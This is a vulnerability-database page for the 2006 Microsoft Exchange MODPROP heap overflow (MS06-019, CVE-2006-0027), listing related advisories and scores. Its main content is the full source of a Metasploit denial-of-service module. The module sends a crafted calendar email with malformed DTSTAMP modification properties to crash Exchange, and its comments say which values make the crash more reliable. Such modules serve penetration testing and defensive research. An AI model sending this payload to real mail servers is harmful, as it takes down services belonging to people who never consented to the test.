Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MS06-019 Exchange MODPROP Heap Overflow

🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 172 Views

MS06-019 Exchange MODPROP Heap Overflow triggers a heap overflow vulnerability in MS Exchange due to malformed MODPROP values in a VCAL request.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2006-0027
29 May 201815:50
circl
Check Point Advisories		Update Protection against Microsoft Exchange Vulnerability (MS06-019)
9 May 200600:00
checkpoint_advisories
CVE		CVE-2006-0027
9 May 200622:00
cve
Cvelist		CVE-2006-0027
9 May 200622:00
cvelist
Metasploit		MS06-019 Exchange MODPROP Heap Overflow
1 May 200713:31
metasploit
NVD		CVE-2006-0027
10 May 200602:10
nvd
Prion		Code injection
10 May 200602:10
prion
securityvulns		Microsoft Security Bulletin MS06-019 Vulnerability in Microsoft Exchange Could Allow Remote Code Execution (916803)
9 May 200600:00
securityvulns
securityvulns		US-CERT Technical Cyber Security Alert TA06-129A -- Microsoft Windows and Exchange Server Vulnerabilities
10 May 200600:00
securityvulns
Tenable Nessus		MS06-019: Vulnerability in Microsoft Exchange Could Allow Remote Code Execution (916803)
9 May 200600:00
nessus
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Smtp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'MS06-019 Exchange MODPROP Heap Overflow',  
'Description' => %q{  
This module triggers a heap overflow vulnerability in MS  
Exchange that occurs when multiple malformed MODPROP values  
occur in a VCAL request.  
},  
'Author' => [ 'pusscat' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'BID', '17908'],  
[ 'CVE', '2006-0027'],  
[ 'MSB', 'MS06-019'],  
  
],  
'DisclosureDate' => '2004-11-12'))  
  
register_options(  
[  
OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])  
])  
  
end  
  
#  
# This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class  
#  
def run  
  
connect_login  
  
modprops = ['attendee', 'categories', 'class', 'created', 'description',  
'dtstamp', 'duration', 'last-modified',  
'location', 'organizer', 'priority', 'recurrence-id', 'sequence',  
'status', 'summary', 'transp', 'uid']  
  
#modprops = ['dtstamp']  
  
modpropshort = ""  
modpropbusted = ""  
modnum = rand(3)  
  
1.upto(modnum) {  
nextprop = rand(modprops.size)  
modpropshort << modprops[nextprop] + ","  
modpropbusted << modprops[nextprop].upcase + ":\r\n"  
}  
  
modpropshort = "dtstamp,"  
modpropbusted = "DTSTAMP:\r\n"  
modnum = modnum + 1 + rand(3)  
modproplong = modpropshort  
1.upto(modnum) {  
modproplong << modprops[rand(modprops.size)] + ","  
}  
  
boundary = Rex::Text.rand_text_alphanumeric(8) + "." + Rex::Text.rand_text_alphanumeric(8)  
  
  
# Really, the randomization above only crashes /sometimes/ - it's MUCH more  
# reliable, and gives crashes in better spots of you use these modprops:  
  
modpropshort = "dtstamp,"  
modproplong = "dtstamp, dtstamp,"  
modpropbusted = "DTSTAMP:\r\n"  
  
mail = "From: #{datastore['MAILFROM']}\r\n"  
mail << "To: #{datastore['MAILTO']}\r\n"  
mail << "Subject: #{datastore['SUBJECT']}\r\n"  
mail << "Content-class: urn:content-classes:calendarmessage\r\n"  
mail << "MIME-Version: 1.0\r\n"  
mail << "Content-Type: multipart/alternative;boundary=\"#{boundary}\"\r\n"  
mail << "X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0\r\n"  
mail << "\r\n"  
mail << "--#{boundary}\r\n"  
mail << "Content-class: urn:content-classes:calendarmessage\r\n"  
mail << "Content-Type: text/calendar; method=REQUEST; name=\"meeting.ics\"\r\n"  
mail << "Content-Transfer-Encoding: 8bit\r\n"  
mail << "\r\n"  
mail << "BEGIN:VCALENDAR\r\n"  
mail << "BEGIN:VEVENT\r\n"  
mail << "X-MICROSOFT-CDO-MODPROPS:#{modpropshort.chop}\r\n"  
mail << modpropbusted  
mail << "END:VEVENT\r\n"  
mail << "BEGIN:VEVENT\r\n"  
mail << "X-MICROSOFT-CDO-MODPROPS:#{modproplong.chop}\r\n"  
mail << "END:VEVENT\r\n"  
mail << "END:VCALENDAR\r\n"  
mail << "\r\n--#{boundary}\r\n"  
mail << "\r\n.\r\n"  
  
  
print_status("Sending message...")  
sock.put(mail)  
sock.put("QUIT\r\n")  
print "<< " + (sock.get_once || '')  
disconnect  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
EPSS0.72186
metasploitremotesmtpheap overflowmicrosoft exchangemodpropvcal requestbid 17908cve 2006-0027msb ms06-019disclosuredate 2004-11-12
172